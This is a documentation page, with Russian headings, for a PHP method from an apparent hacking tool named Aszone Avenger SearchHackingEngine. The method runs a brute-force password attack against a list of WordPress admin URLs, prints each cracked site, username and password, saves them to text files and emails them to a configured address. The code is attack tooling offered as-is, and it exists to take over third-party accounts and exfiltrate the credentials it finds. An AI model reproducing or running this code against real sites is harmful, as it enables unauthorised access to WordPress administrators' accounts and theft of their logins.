Aszone\Avenger\SearchHackingEngine::runExploitBTWP PHP Метод

runExploitBTWP() защищенный Метод

protected runExploitBTWP ( $result, $commandData, Symfony\Component\Console\Output\OutputInterface $output )
$output Symfony\Component\Console\Output\OutputInterface
    protected function runExploitBTWP($result, $commandData, OutputInterface $output)
    {
        $output->writeln('<info>********Executing command exploit Brute Force in WordPress*******</info>');
        $output->writeln('<info>******************Extract Files of Targets***********************</info>');
        $output->writeln('*-----------------------------------------------------------------------------');
        $output->writeln('');
        $btwp = new Exploits\BruteForceWordPress($commandData);
        $result['isAdmin'] = array_unique($result['isAdmin']);
        foreach ($result['isAdmin'] as $url) {
            $resBtwp['isAdmin'] = $btwp->execute($url);
            if ($resBtwp) {
                foreach ($resBtwp['isAdmin'] as $keyResult => $results) {
                    $output->writeln('<info>********************Print Results***********************</info>');
                    $output->writeln('<info>Site: ' . $results['site'] . '</info>');
                    $output->writeln('<info>User: ' . $results['user'] . '</info>');
                    $output->writeln('<info>Password: ' . $results['password'] . '</info>');
                    $output->writeln('<info>********************************************************</info>');
                    $nameTxt = str_replace('/', '_', $results['site'] . '_' . $results['user']);
                    $nameTxt = str_replace(':', '_', $nameTxt);
                    $this->saveTxtBtwp($resBtwp['isAdmin'], $nameTxt);
                    if (!empty($this->email)) {
                        $this->sendMailBtResult($resBtwp, $this->email);
                        $this->printResumeResult($output, 'Email to send:', $this->email);
                    }
                }
            }
        }
    }